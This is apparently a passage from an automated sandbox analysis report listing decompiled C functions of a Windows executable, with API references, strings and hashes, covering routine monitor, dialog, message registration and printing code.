				intOrPtr _t11;
				struct HINSTANCE__* _t15;
				intOrPtr _t17;
				_Unknown_base(*)()* _t18;

				_t17 =  *0x439620; // 0x0
				if(_t17 == 0) {
					_t15 = GetModuleHandleA("USER32");
					if(_t15 == 0) {
						L10:
						 *0x439608 = 0;
						 *0x43960c = 0;
						 *0x439610 = 0;
						 *0x439614 = 0;
						 *0x439618 = 0;
						 *0x43961c = 0;
						 *0x439620 = 1;
						return 0;
					}
					_t5 = GetProcAddress(_t15, "GetSystemMetrics");
					 *0x439608 = _t5;
					if(_t5 == 0) {
						goto L10;
					}
					_t6 = GetProcAddress(_t15, "MonitorFromWindow");
					 *0x43960c = _t6;
					if(_t6 == 0) {
						goto L10;
					}
					_t7 = GetProcAddress(_t15, "MonitorFromRect");
					 *0x439610 = _t7;
					if(_t7 == 0) {
						goto L10;
					}
					_t8 = GetProcAddress(_t15, "MonitorFromPoint");
					 *0x439614 = _t8;
					if(_t8 == 0) {
						goto L10;
					}
					_t9 = GetProcAddress(_t15, "EnumDisplayMonitors");
					 *0x43961c = _t9;
					if(_t9 == 0) {
						goto L10;
					}
					_t10 = GetProcAddress(_t15, "GetMonitorInfoA");
					 *0x439618 = _t10;
					if(_t10 == 0) {
						goto L10;
					}
					_t11 = 1;
					 *0x439620 = _t11;
					return _t11;
				}
				_t18 =  *0x439618; // 0x0
				return 0 | _t18 != 0x00000000;
			}

0x00404dd5
0x00404ddd
0x00404dfa
0x00404dfe
0x00404e76
0x00404e76
0x00404e7c
0x00404e82
0x00404e88
0x00404e8e
0x00404e94
0x00404e9a
0x00000000
0x00404ea4
0x00404e0c
0x00404e10
0x00404e15
0x00000000
0x00000000
0x00404e1d
0x00404e21
0x00404e26
0x00000000
0x00000000
0x00404e2e
0x00404e32
0x00404e37
0x00000000
0x00000000
0x00404e3f
0x00404e43
0x00404e48
0x00000000
0x00000000
0x00404e50
0x00404e54
0x00404e59
0x00000000
0x00000000
0x00404e61
0x00404e65
0x00404e6a
0x00000000
0x00000000
0x00404e6e
0x00404e6f
0x00000000
0x00404e6f
0x00404de1
0x00000000

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,00404F0B), ref: 00404DF4
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00404E0C
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00404E1D
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00404E2E
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 00404E3F
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 00404E50
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00404E61

Strings

MonitorFromRect, xrefs: 00404E28
USER32, xrefs: 00404DEF
GetMonitorInfoA, xrefs: 00404E5B
MonitorFromWindow, xrefs: 00404E17
GetSystemMetrics, xrefs: 00404E06
EnumDisplayMonitors, xrefs: 00404E4A
MonitorFromPoint, xrefs: 00404E39

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
Instruction ID: 29823efdfea0b27d0eaeb5a685ee6fdb8badc97bb1bd0a8226dd1226ed208354
Opcode Fuzzy Hash: 7fe9bb0b6ed3d21d0ae434ea7fe5d9344b061dff9957d0254bf9a7d52565b885
Instruction Fuzzy Hash: 081124B0A02610EAC711DF35ECD296FBAA4B7887643A4A53FD114E2290D7BC4941CBED

Uniqueness

Uniqueness Score: -1.00%

Function 0042204B, Relevance: 24.2, APIs: 16, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042204B(intOrPtr* __ecx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v0;
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _t59;
				int _t61;
				int _t65;
				struct HWND__* _t74;
				struct HWND__* _t79;
				struct HMENU__* _t81;
				struct HWND__* _t84;
				struct HWND__* _t88;
				signed int _t90;
				signed int _t91;
				struct HMENU__* _t103;
				intOrPtr* _t106;
				int _t108;
				intOrPtr* _t117;
				int* _t118;
				intOrPtr* _t119;
				struct HWND__* _t120;

				_t119 = __ecx;
				_t59 =  *((intOrPtr*)( *__ecx + 0xc0))();
				_t103 = 0;
				_v4 = _t59;
				if(_a4 != 0) {
					_t117 =  *((intOrPtr*)(_t59 + 0x68));
					if(_t117 != 0) {
						 *((intOrPtr*)( *_t117 + 0x5c))(0);
					}
				}
				_t120 =  *(_t119 + 0x70);
				_t118 = _a8;
				_v12 = _t103;
				if(_t120 == _t103) {
					L13:
					_t118[2] = _v12;
					if(_a4 == _t103) {
						 *(_t119 + 0x9c) = _t103;
						_t61 = GetDlgItem( *(_t119 + 0x1c), 0xea21);
						__eflags = _t61;
						_a4 = _t61;
						if(_t61 != 0) {
							_t74 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
							__eflags = _t74;
							if(_t74 != 0) {
								SetWindowLongA(_t74, 0xfffffff4, 0xea21);
							}
							SetWindowLongA(_a4, 0xfffffff4, 0xe900);
						}
						__eflags = _t118[1];
						if(_t118[1] != 0) {
							InvalidateRect( *(_t119 + 0x1c), 0, 1);
							SetMenu( *(_t119 + 0x1c), _t118[1]);
						}
						_t108 =  *(_v4 + 0x68);
						__eflags = _t108;
						if(_t108 != 0) {
							 *((intOrPtr*)( *_t108 + 0x5c))(1);
						}
						 *((intOrPtr*)( *_t119 + 0xc8))(1);
						_t65 =  *_t118;
						__eflags = _t65 - 0xe900;
						if(_t65 != 0xe900) {
							_v0 = GetDlgItem( *(_t119 + 0x1c), _t65);
						}
						ShowWindow(_v0, 5);
						 *(_t119 + 0x48) = _t118[5];
						return E00420A8B(1);
					}
					 *(_t119 + 0x9c) = _t118[4];
					E00420A8B(_t103);
					_t79 = GetDlgItem( *(_t119 + 0x1c),  *_t118);
					_v0 = _t79;
					ShowWindow(_t79, _t103);
					_t81 = GetMenu( *(_t119 + 0x1c));
					_t118[1] = _t81;
					if(_t81 != _t103) {
						InvalidateRect( *(_t119 + 0x1c), _t103, 1);
						SetMenu( *(_t119 + 0x1c), _t103);
						 *(_t119 + 0xb8) =  *(_t119 + 0xb8) & 0xfffffffe;
					}
					_t118[5] =  *(_t119 + 0x48);
					 *(_t119 + 0x48) = _t103;
					E0042065C(_t119, 0x7915);
					if( *_t118 == 0xe900) {
						_t84 = _a4;
					} else {
						_t84 = GetDlgItem( *(_t119 + 0x1c), 0xe900);
					}
					if(_t84 == 0) {
						return _t84;
					} else {
						return SetWindowLongA(_t84, 0xfffffff4, 0xea21);
					}
				} else {
					goto L4;
				}
				do {
					L4:
					_t88 = _t120;
					_t120 = _v0;
					_t106 =  *((intOrPtr*)(_t88 + 8));
					_t90 = GetDlgCtrlID( *(_t106 + 0x1c)) & 0x0000ffff;
					_v8 = _t90;
					if(_t90 >= 0xe800 && _t90 <= 0xe81f) {
						_t91 = 1;
						_a8 = _t91 << _t90 - 0xe800;
						if( *((intOrPtr*)( *_t106 + 0xc8))() != 0) {
							_v12 = _v12 | _a8;
						}
						if( *((intOrPtr*)( *_t106 + 0xd0))() == 0 || _v8 != 0xe81f) {
							E00421741(_t118[2] & _a8, _t106, _t118[2] & _a8, 1);
						}
					}
				} while (_t120 != 0);
				_t103 = 0;
				goto L13;
			}

0x00422051
0x00422056
0x0042205c
0x0042205e
0x00422066
0x00422068
0x0042206d
0x00422072
0x00422072
0x0042206d
0x00422075
0x00422078
0x0042207e
0x00422082
0x004220ff
0x00422107
0x0042210a
0x004221ba
0x004221c0
0x004221c2
0x004221c4
0x004221cd
0x004221d3
0x004221d5
0x004221d7
0x004221e1
0x004221e1
0x004221ee
0x004221ee
0x004221f4
0x004221f8
0x00422201
0x0042220d
0x0042220d
0x00422217
0x0042221a
0x0042221c
0x00422222
0x00422222
0x0042222b
0x00422231
0x00422233
0x00422235
0x0042223d
0x0042223d
0x00422247
0x00422254
0x00000000
0x00422257
0x00422116
0x0042211c
0x0042212c
0x00422130
0x00422134
0x0042213d
0x00422145
0x00422148
0x00422150
0x0042215a
0x00422160
0x00422160
0x0042216f
0x00422174
0x00422177
0x00422183
0x0042218d
0x00422185
0x00422189
0x00422189
0x00422193
0x00422263
0x00422199
0x00000000
0x004221a1
0x00000000
0x00000000
0x00000000
0x00422084
0x00422084
0x00422084
0x00422086
0x00422089
0x00422095
0x0042209d
0x004220a1
0x004220b2
0x004220b7
0x004220c5
0x004220cb
0x004220cb
0x004220db
0x004220f4
0x004220f4
0x004220db
0x004220f9
0x004220fd
0x00000000

APIs

GetDlgCtrlID.USER32 ref: 0042208F
GetDlgItem.USER32 ref: 0042212C
ShowWindow.USER32(00000000,00000000), ref: 00422134
GetMenu.USER32(?), ref: 0042213D
InvalidateRect.USER32(?,00000000,00000001), ref: 00422150
SetMenu.USER32(?,00000000), ref: 0042215A
GetDlgItem.USER32 ref: 00422189
SetWindowLongA.USER32 ref: 004221A1
GetDlgItem.USER32 ref: 004221C0
GetDlgItem.USER32 ref: 004221D3
SetWindowLongA.USER32 ref: 004221E1
SetWindowLongA.USER32 ref: 004221EE
InvalidateRect.USER32(?,00000000,00000001), ref: 00422201
SetMenu.USER32(?,00000000), ref: 0042220D
GetDlgItem.USER32 ref: 0042223B
ShowWindow.USER32(?,00000005), ref: 00422247

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ItemWindow$LongMenu$InvalidateRectShow$Ctrl
String ID:
API String ID: 461998371-0
Opcode ID: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
Instruction ID: 11e971c61f50c2e3f40baeddfbca8ed65bc2cf00756bcc02c89e332112038adb
Opcode Fuzzy Hash: d02aa0295a976195957299b934b265eafdd74fa1612fec68cc443af8d633833d
Instruction Fuzzy Hash: D4617D30700311AFD7209F64EC88A2ABBF4FF48304F504A2EF656972A1CB75E855CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004107DB, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 114
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004107DB(struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* _t32;
				signed int _t34;
				void* _t40;
				int _t49;
				signed int _t58;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				if(_a4 == 0) {
					L19:
					return 0;
				}
				_t64 = E00425C92(0x4397cc, E0042440D);
				_t54 =  *(_t64 + 0x18);
				if( *(_t64 + 0x18) != 0) {
					E00416433(_t54, _a4);
					 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				}
				_t63 = _a8;
				if(_t63 != 0x110) {
					__eflags = _t63 -  *0x439cb0; // 0x0
					if(__eflags == 0) {
						L22:
						SendMessageA(_a4, 0x111, 0xe146, 0);
						_t32 = 1;
						return _t32;
					}
					__eflags = _t63 - 0x111;
					if(_t63 != 0x111) {
						L8:
						__eflags = _t63 - 0xc000;
						if(_t63 < 0xc000) {
							goto L19;
						}
						_push(_a4);
						_t65 = E00413767();
						_t34 = E00416753(_t65, 0x42e898);
						__eflags = _t34;
						if(_t34 == 0) {
							L11:
							__eflags = _t63 -  *0x439cbc; // 0x0
							if(__eflags != 0) {
								__eflags = _t63 -  *0x439cb8; // 0x0
								if(__eflags != 0) {
									__eflags = _t63 -  *0x439cc0; // 0x0
									if(__eflags != 0) {
										__eflags = _t63 -  *0x439cb4; // 0x0
										if(__eflags != 0) {
											goto L19;
										}
										return  *((intOrPtr*)( *_t65 + 0xd0))();
									}
									_t58 = _a16 >> 0x10;
									__eflags = _t58;
									 *((intOrPtr*)( *_t65 + 0xd8))(_a12, _a16 & 0x0000ffff, _t58);
									goto L19;
								}
								__eflags =  *0x439c3c;
								if( *0x439c3c != 0) {
									 *(_t65 + 0x1f4) = _a16;
								}
								_t40 =  *((intOrPtr*)( *_t65 + 0xd4))();
								 *(_t65 + 0x1f4) =  *(_t65 + 0x1f4) & 0x00000000;
								return _t40;
							}
							return  *((intOrPtr*)( *_t65 + 0xd0))(_a16);
						}
						__eflags =  *(_t65 + 0x92) & 0x00000008;
						if(( *(_t65 + 0x92) & 0x00000008) != 0) {
							goto L19;
						}
						goto L11;
					}
					__eflags = _a12 - 0x40e;
					if(_a12 == 0x40e) {
						goto L22;
					}
					goto L8;
				} else {
					 *0x439cc0 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
					 *0x439cbc = RegisterWindowMessageA("commdlg_ShareViolation");
					 *0x439cb8 = RegisterWindowMessageA("commdlg_FileNameOK");
					 *0x439cb4 = RegisterWindowMessageA("commdlg_ColorOK");
					 *0x439cb0 = RegisterWindowMessageA("commdlg_help");
					_t49 = RegisterWindowMessageA("commdlg_SetRGBColor");
					_push(_a16);
					 *0x439cac = _t49;
					_push(_a12);
					return E00411B77(_t54, _a4, 0x110);
				}
			}

0x004107e5
0x00410932
0x00000000
0x00410932
0x004107fa
0x004107fc
0x00410801
0x00410806
0x0041080b
0x0041080b
0x0041080f
0x00410819
0x0041087d
0x00410888
0x0041094a
0x00410955
0x0041095d
0x00000000
0x0041095d
0x0041088e
0x00410890
0x0041089e
0x0041089e
0x004108a4
0x00000000
0x00000000
0x004108aa
0x004108b2
0x004108bb
0x004108c0
0x004108c2
0x004108cd
0x004108cd
0x004108d3
0x004108e4
0x004108ea
0x00410911
0x00410917
0x00410936
0x0041093c
0x00000000
0x00000000
0x00000000
0x00410942
0x0041091e
0x0041091e
0x0041092c
0x00000000
0x0041092c
0x004108ec
0x004108f3
0x004108f8
0x004108f8
0x00410902
0x00410908
0x00000000
0x00410908
0x00000000
0x004108dc
0x004108c4
0x004108cb
0x00000000
0x00000000
0x00000000
0x004108cb
0x00410892
0x00410898
0x00000000
0x00000000
0x00000000
0x0041081b
0x0041082d
0x00410839
0x00410845
0x00410851
0x0041085d
0x00410862
0x00410864
0x00410867
0x0041086c
0x00000000
0x00410873

APIs

Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1

RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,Function_0002440D), ref: 00410826
RegisterWindowMessageA.USER32(commdlg_ShareViolation), ref: 00410832
RegisterWindowMessageA.USER32(commdlg_FileNameOK), ref: 0041083E
RegisterWindowMessageA.USER32(commdlg_ColorOK), ref: 0041084A
RegisterWindowMessageA.USER32(commdlg_help), ref: 00410856
RegisterWindowMessageA.USER32(commdlg_SetRGBColor), ref: 00410862

Part of subcall function 00416433: SetWindowLongA.USER32 ref: 00416462

SendMessageA.USER32(00000000,00000111,0000E146,00000000), ref: 00410955

Strings

commdlg_ShareViolation, xrefs: 00410828
commdlg_help, xrefs: 0041084C
commdlg_SetRGBColor, xrefs: 00410858
commdlg_ColorOK, xrefs: 00410840
commdlg_FileNameOK, xrefs: 00410834
commdlg_LBSelChangedNotify, xrefs: 00410821

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageWindow$Register$LongSendValue
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 2377901579-3888057576
Opcode ID: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
Instruction ID: 0c99fb2fb3094324f535d28c6dff1db6175635640ea54eadaac3d4f9a63322fb
Opcode Fuzzy Hash: cf20618efcf828f21c6f481f5fb3a6feff5832e9dcd2cfa321dd56f44a1a627e
Instruction Fuzzy Hash: B041AFB1704214ABDF24AF29DD54BAE3BA1EB00754F11542BF405972A2CBB99CC0CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00428103, Relevance: 21.5, APIs: 14, Instructions: 480
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00428103(intOrPtr* __ecx, void* __eflags) {
				void* __ebx;
				signed int _t227;
				void* _t228;
				CHAR* _t229;
				intOrPtr _t231;
				CHAR* _t232;
				signed int _t233;
				CHAR* _t242;
				CHAR* _t243;
				CHAR* _t253;
				intOrPtr* _t256;
				intOrPtr _t265;
				signed char _t266;
				intOrPtr _t268;
				int _t290;
				int _t296;
				signed int _t300;
				int _t310;
				void* _t323;
				void* _t335;
				void* _t337;
				intOrPtr _t353;
				struct HDC__* _t355;
				intOrPtr _t357;
				signed char _t383;
				void* _t396;
				signed int _t449;
				intOrPtr* _t452;
				intOrPtr* _t455;
				struct _DOCINFOA _t458;
				void* _t460;
				signed char _t461;
				void* _t463;
				void* _t465;
				void* _t466;
				void* _t468;

				E00406520(E0042A280, _t463);
				_t466 = _t465 - 0x32c;
				_t452 = __ecx;
				 *((intOrPtr*)(_t463 - 0x24)) = __ecx;
				E00428824(_t463 - 0x80);
				 *(_t463 - 4) = 0;
				if( *((short*)(E00413672() + 8)) != 0xe108) {
					L6:
					_t227 =  *((intOrPtr*)( *_t452 + 0xf4))(_t463 - 0x80);
					__eflags = _t227;
					if(_t227 != 0) {
						_t229 =  *0x436980; // 0x436994
						 *(_t463 - 0x3c) = _t229;
						 *(_t463 - 4) = 1;
						_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
						__eflags =  *(_t231 + 0x14) & 0x00000020;
						if(( *(_t231 + 0x14) & 0x00000020) == 0) {
							L12:
							_t232 =  *0x436980; // 0x436994
							 *(_t463 - 0x14) = _t232;
							_t233 =  *(_t452 + 0x3c);
							 *(_t463 - 4) = 0xa;
							__eflags = _t233;
							if(_t233 == 0) {
								E004140EE(E00414C6C(_t452), _t463 - 0x14);
							} else {
								E00416B95(_t463 - 0x14, _t463, _t233 + 0x1c);
							}
							__eflags =  *((intOrPtr*)( *(_t463 - 0x14) - 8)) - 0x1f;
							if(__eflags > 0) {
								E00416D10(_t463 - 0x14, __eflags, 0x1f);
							}
							_t458 = 0x14;
							E00406330(_t463 - 0x94, 0, _t458);
							_t468 = _t466 + 0xc;
							 *(_t463 - 0x90) =  *(_t463 - 0x14);
							_t242 =  *0x436980; // 0x436994
							 *(_t463 - 0x94) = _t458;
							 *(_t463 - 0x38) = _t242;
							_t243 =  *(_t463 - 0x3c);
							 *(_t463 - 4) = 0xb;
							__eflags =  *(_t243 - 8);
							if( *(_t243 - 8) != 0) {
								 *(_t463 - 0x8c) = _t243;
								E00417CBF(_t243, E00416CC1(_t463 - 0x38, _t463, 0x104), 0x104);
								_t460 = 0xf049;
							} else {
								 *(_t463 - 0x8c) = 0;
								_t323 = E004102D0( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
								 *(_t463 - 4) = 0xc;
								E00416B95(_t463 - 0x38, _t463, _t323);
								 *(_t463 - 4) = 0xb;
								E00416AEC(_t463 - 0x18);
								_t460 = 0xf040;
							}
							E00419B00(_t463 - 0x34);
							__eflags =  *(_t463 - 0x7c);
							 *(_t463 - 4) = 0xd;
							if( *(_t463 - 0x7c) == 0) {
								E00419BB7(_t463 - 0x34,  *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10));
								 *(_t463 - 0x28) = 1;
							}
							 *((intOrPtr*)( *_t452 + 0xf8))(_t463 - 0x34, _t463 - 0x80);
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) == 0) {
								SetAbortProc( *(_t463 - 0x30), E00427F7F);
							}
							E004166CE(E00404DAE(), 0);
							_push(_t452);
							E00428772(_t463 - 0xf0, __eflags);
							_t253 =  *0x436980; // 0x436994
							 *(_t463 - 0x20) = _t253;
							 *(_t463 - 4) = 0xf;
							E004164C6(_t463 - 0xf0, 0xc9,  *(_t463 - 0x14));
							_t256 = E00410292( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
							 *(_t463 - 4) = 0x10;
							E004164C6(_t463 - 0xf0, 0xca,  *_t256);
							 *(_t463 - 4) = 0xf;
							E00416AEC(_t463 - 0x18);
							E0041E3FA(_t463 - 0x20, _t460,  *(_t463 - 0x38));
							E004164C6(_t463 - 0xf0, 0xcb,  *(_t463 - 0x20));
							E0041668C(_t463 - 0xf0, 5);
							UpdateWindow( *(_t463 - 0xd4));
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								L27:
								_t265 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
								_t449 =  *(_t265 + 0x1a) & 0x0000ffff;
								_t383 =  *(_t265 + 0x1c) & 0x0000ffff;
								_t461 =  *(_t265 + 0x18) & 0x0000ffff;
								__eflags = _t449 - _t383;
								 *(_t463 - 0x10) = _t449;
								if(_t449 < _t383) {
									 *(_t463 - 0x10) = _t383;
								}
								_t266 =  *(_t265 + 0x1e) & 0x0000ffff;
								__eflags =  *(_t463 - 0x10) - _t266;
								if( *(_t463 - 0x10) > _t266) {
									 *(_t463 - 0x10) = _t266;
								}
								__eflags = _t461 - _t383;
								if(_t461 < _t383) {
									_t461 = _t383;
								}
								__eflags = _t461 - _t266;
								if(_t461 > _t266) {
									_t461 = _t266;
								}
								__eflags =  *(_t463 - 0x10) - _t461;
								asm("sbb eax, eax");
								_t268 = (_t266 & 0x000000fe) + 1;
								__eflags =  *(_t463 - 0x10) - 0xffff;
								 *((intOrPtr*)(_t463 - 0x18)) = _t268;
								if(__eflags != 0) {
									_t151 = _t463 - 0x10;
									 *_t151 =  *(_t463 - 0x10) + _t268;
									__eflags =  *_t151;
								} else {
									 *(_t463 - 0x10) = 0xffff;
								}
								E00417214(_t463 - 0x20, __eflags, 0xf043);
								__eflags =  *(_t463 - 0x7c);
								 *(_t463 - 0x1c) = 0;
								if( *(_t463 - 0x7c) == 0) {
									__eflags = _t461 -  *(_t463 - 0x10);
									 *(_t463 - 0x6c) = _t461;
									if(_t461 ==  *(_t463 - 0x10)) {
										goto L53;
									} else {
										while(1) {
											 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
											__eflags =  *(_t463 - 0x70);
											if( *(_t463 - 0x70) == 0) {
												goto L51;
											}
											wsprintfA(_t463 - 0x140,  *(_t463 - 0x20),  *(_t463 - 0x6c));
											_t468 = _t468 + 0xc;
											E004164C6(_t463 - 0xf0, 0xcc, _t463 - 0x140);
											_t290 = GetDeviceCaps( *(_t463 - 0x2c), 0xa);
											SetRect(_t463 - 0x5c, 0, 0, GetDeviceCaps( *(_t463 - 0x2c), 8), _t290);
											DPtoLP( *(_t463 - 0x2c), _t463 - 0x5c, 2);
											_t296 = StartPage( *(_t463 - 0x30));
											__eflags = _t296;
											if(_t296 < 0) {
												L50:
												_t452 =  *((intOrPtr*)(_t463 - 0x24));
												 *(_t463 - 0x1c) = 1;
											} else {
												__eflags =  *0x439c48; // 0x1
												_t455 =  *((intOrPtr*)(_t463 - 0x24));
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t455 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
												}
												 *((intOrPtr*)( *_t455 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
												__eflags = EndPage( *(_t463 - 0x30));
												if(__eflags < 0) {
													goto L50;
												} else {
													_t300 = E00427F7F(__eflags,  *(_t463 - 0x30), 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L50;
													} else {
														_t452 =  *((intOrPtr*)(_t463 - 0x24));
														 *(_t463 - 0x6c) =  *(_t463 - 0x6c) +  *((intOrPtr*)(_t463 - 0x18));
														__eflags =  *(_t463 - 0x6c) -  *(_t463 - 0x10);
														if( *(_t463 - 0x6c) !=  *(_t463 - 0x10)) {
															continue;
														} else {
														}
													}
												}
											}
											goto L51;
										}
										goto L51;
									}
								} else {
									 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
									 *((intOrPtr*)( *_t452 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
									L51:
									__eflags =  *(_t463 - 0x7c);
									if( *(_t463 - 0x7c) == 0) {
										__eflags =  *(_t463 - 0x1c);
										if( *(_t463 - 0x1c) != 0) {
											AbortDoc( *(_t463 - 0x30));
										} else {
											L53:
											EndDoc( *(_t463 - 0x30));
										}
									}
								}
								E004166CE(E00404DAE(), 1);
								 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
								E00413F6F(_t463 - 0xf0);
								E00419BEE(_t463 - 0x34);
							} else {
								_t310 = StartDocA( *(_t463 - 0x30), _t463 - 0x94);
								__eflags = _t310 - 0xffffffff;
								if(_t310 != 0xffffffff) {
									goto L27;
								} else {
									E004166CE(E00404DAE(), 1);
									 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
									E00413F6F(_t463 - 0xf0);
									E00419BEE(_t463 - 0x34);
									_push(0xffffffff);
									_push(0);
									_push(0xf106);
									E0041BB7E(_t463 - 0x34, __eflags);
								}
							}
							 *(_t463 - 4) = 0xe;
							E00416AEC(_t463 - 0x20);
							 *(_t463 - 4) = 0xd;
							 *((intOrPtr*)(_t463 - 0xf0)) = 0x42cb34;
							E00411D13(_t463 - 0xf0);
							 *(_t463 - 4) = 0xb;
							E00419C1F(_t463 - 0x34);
							 *(_t463 - 4) = 0xa;
							E00416AEC(_t463 - 0x38);
							 *(_t463 - 4) = 1;
							_t396 = _t463 - 0x14;
						} else {
							__eflags =  *(_t463 - 0x7c);
							if( *(_t463 - 0x7c) != 0) {
								goto L12;
							} else {
								E00416B16(_t463 - 0x1c, _t463, 0xf045);
								 *(_t463 - 4) = 2;
								E00416B16(_t463 - 0x40, _t463, 0xf046);
								 *(_t463 - 4) = 3;
								E00416B16(_t463 - 0x44, _t463, 0xf047);
								 *(_t463 - 4) = 4;
								E00416B16(_t463 - 0x10, _t463, 0xf048);
								_push(0);
								_push( *((intOrPtr*)(_t463 - 0x44)));
								 *(_t463 - 4) = 5;
								_push(6);
								_push( *((intOrPtr*)(_t463 - 0x40)));
								_push( *(_t463 - 0x1c));
								_push(0);
								E00410385(_t463 - 0x338);
								 *(_t463 - 4) = 6;
								 *(_t463 - 0x2ac) =  *(_t463 - 0x10);
								_t335 = E004104E7(0);
								__eflags = _t335 - 1;
								if(_t335 == 1) {
									_push(_t463 - 0x18);
									_t337 = E004105C2(_t463 - 0x338);
									 *(_t463 - 4) = 8;
									E00416B95(_t463 - 0x3c, _t463, _t337);
									 *(_t463 - 4) = 6;
									E00416AEC(_t463 - 0x18);
									 *(_t463 - 4) = 9;
									E00416AEC(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00411D13(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00416AEC(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00416AEC(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00416AEC(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									E00416AEC(_t463 - 0x1c);
									goto L12;
								} else {
									 *(_t463 - 4) = 7;
									E00416AEC(_t463 - 0x28c);
									 *(_t463 - 4) = 5;
									E00411D13(_t463 - 0x338);
									 *(_t463 - 4) = 4;
									E00416AEC(_t463 - 0x10);
									 *(_t463 - 4) = 3;
									E00416AEC(_t463 - 0x44);
									 *(_t463 - 4) = 2;
									E00416AEC(_t463 - 0x40);
									 *(_t463 - 4) = 1;
									_t396 = _t463 - 0x1c;
								}
							}
						}
						E00416AEC(_t396);
						 *(_t463 - 4) = 0;
						E00416AEC(_t463 - 0x3c);
					}
				} else {
					_t353 =  *((intOrPtr*)( *((intOrPtr*)(E00424BFB() + 4)) + 0xac));
					if(_t353 == 0 ||  *((intOrPtr*)(_t353 + 0x10)) != 3) {
						L5:
						 *(_t463 - 0x74) = 1;
						goto L6;
					} else {
						_t355 = CreateDCA( *(_t353 + 0x1c),  *(_t353 + 0x18),  *(_t353 + 0x20), 0);
